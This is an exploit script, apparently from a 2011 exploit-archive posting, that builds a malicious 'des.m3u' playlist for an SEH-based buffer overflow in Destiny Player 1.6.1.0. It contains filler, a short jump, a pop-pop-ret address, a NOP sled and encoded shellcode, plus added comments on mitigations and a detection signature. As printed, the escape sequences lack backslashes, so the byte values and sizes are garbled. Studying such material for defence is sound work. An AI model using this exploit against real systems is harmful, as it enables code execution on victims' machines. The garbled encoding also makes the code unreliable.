
Destiny Player 1.6.1.0 Buffer Overflow

Posted on 05 July 2011

# Generator for "des.m3u", the crafted playlist this page presents as a
# proof of concept for an SEH-based stack buffer overflow in Destiny Player
# v1.6.1.0 (see the banner text below).
#
# NOTE(review): every string literal is reproduced exactly as the page shows
# it. The "xNN" groups carry no backslash here, so Python treats each one as
# three ordinary characters, and every repeat count and len() below is
# computed over those characters. Presumably the published original differed;
# confirm against the original advisory before relying on any size here.
#
# File layout, in write order:
#   header     playlist preamble; the hex groups spell
#              "DestinyPlayList 00000000", "#EXTM3U" and "#EXTINF:0,"
#   filler     one literal repeated 5292 times
#   nseh, se   the two fields of the exception-handler record the overflow
#              is meant to overwrite (per the banner and the author's comment)
#   nops       one literal repeated 20 times
#   shellcode  encoded payload; its behaviour is not stated on the page
#   tail_pad   padding sized as 10000 minus the length of everything above
#
# For defenders: the handler value is a hard-coded address, so the technique
# as listed presumably depends on a module mapped at a fixed base without
# exception-handler validation; SafeSEH/SEHOP together with ASLR and DEP are
# the mitigations aimed at this class. A playlist whose "#EXTINF:0," entry is
# followed by thousands of identical bytes is a simple content signature for
# files built this way.

# Banner printed before the file is written (text kept exactly as published).
BANNER = (
    " ||=============================================================||",
    " || ||",
    " || / 0-Exploit (Zer0 Thunder) ||",
    " || ,, / /--------------------------------------------||",
    " || '-.`()/`.-' =========================== ||",
    " || .--_'( )'_--. Destiny Player v1.6.1.0 ||",
    " || / /` /`**` ` SEH Buffer OverFlow (m3u) ||",
    " || | | >< | | ||",
    " || / / ||",
    " || '.__.' ||",
    " || ||",
    " ||=============================================================||",
)
for banner_line in BANNER:
    print(banner_line)

# Name of the playlist file created in the current working directory.
filename = "des.m3u"

# Playlist preamble: three pieces joined in the order the original appended them.
header = "".join((
    "x44x65x73x74x69x6ex79x50x6cx61x79x4cx69x73x74x20x30x30x30x30x30x30x30x30 ",
    "x23x45x58x54x4dx33x55 ",
    "x23x45x58x54x49x4ex46x3ax30x2c ",
))

# Filler placed between the preamble and the handler record.
filler = "x41" * 5292

# First field of the handler record.
nseh = "xebx06x90x90"

# Second field of the handler record; the address note is the author's own.
se = "x25x12xd1x72"  #0x72d11225 pop edi; pop esi; retn 0x000c

# Short run placed directly in front of the payload.
nops = "x90" * 20

# Encoded payload, kept chunk for chunk as published.
shellcode = (
    "xdaxc1xd9x74x24xf4x5ax4ax4ax4ax4ax43x43x43x43"
    "x43x43x43x52x59x56x54x58x33x30x56x58x34x41x50"
    "x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54"
    "x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38"
    "x41x43x4ax4ax49x4bx4cx5ax48x4dx59x43x30x43x30"
    "x43x30x43x50x4bx39x4bx55x56x51x58x52x52x44x4c"
    "x4bx50x52x56x50x4cx4bx56x32x54x4cx4cx4bx56x32"
    "x45x44x4cx4bx52x52x47x58x54x4fx4ex57x50x4ax56"
    "x46x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45x31"
    "x43x4cx54x42x56x4cx47x50x4fx31x58x4fx54x4dx43"
    "x31x4fx37x4dx32x5ax50x56x32x51x47x4cx4bx56x32"
    "x54x50x4cx4bx51x52x47x4cx43x31x4ex30x4cx4bx47"
    "x30x54x38x4dx55x49x50x43x44x51x5ax45x51x4ex30"
    "x56x30x4cx4bx51x58x54x58x4cx4bx56x38x47x50x43"
    "x31x58x53x5ax43x47x4cx47x39x4cx4bx47x44x4cx4b"
    "x43x31x58x56x50x31x4bx4fx50x31x49x50x4ex4cx49"
    "x51x58x4fx54x4dx45x51x58x47x47x48x4dx30x52x55"
    "x4bx44x45x53x43x4dx5ax58x47x4bx43x4dx47x54x52"
    "x55x5ax42x50x58x4cx4bx51x48x51x34x43x31x49x43"
    "x52x46x4cx4bx54x4cx50x4bx4cx4bx51x48x45x4cx45"
    "x51x58x53x4cx4bx45x54x4cx4bx43x31x58x50x4dx59"
    "x47x34x51x34x47x54x51x4bx51x4bx45x31x51x49x51"
    "x4ax56x31x4bx4fx4dx30x50x58x51x4fx51x4ax4cx4b"
    "x45x42x5ax4bx4cx46x51x4dx52x4ax43x31x4cx4dx4d"
    "x55x4ex59x43x30x45x50x45x50x56x30x52x48x56x51"
    "x4cx4bx52x4fx4cx47x4bx4fx49x45x4fx4bx5ax50x4f"
    "x45x49x32x50x56x45x38x4fx56x5ax35x4fx4dx4dx4d"
    "x4bx4fx4ex35x47x4cx45x56x43x4cx45x5ax4dx50x4b"
    "x4bx4dx30x52x55x45x55x4fx4bx51x57x52x33x52x52"
    "x52x4fx52x4ax43x30x56x33x4bx4fx4ex35x45x33x45"
    "x31x52x4cx52x43x56x4ex45x35x54x38x43x55x43x30"
    "x41x41"
)

# Everything that precedes the trailing padding, in write order.
body = header + filler + nseh + se + nops + shellcode

# Trailing padding; a negative repeat count yields an empty string.
tail_pad = "x44" * (10000 - len(body))
payload = body + tail_pad

# Write the playlist in text mode, report it, then close the handle.
out = open(filename, 'w')
out.write(payload)
print(" [+] File " + filename + " has been created")
out.close()

#E-mail : neonwarlock@live.com
#Blog/Site : zt-security.net
# Sri Lankan Hackers

 
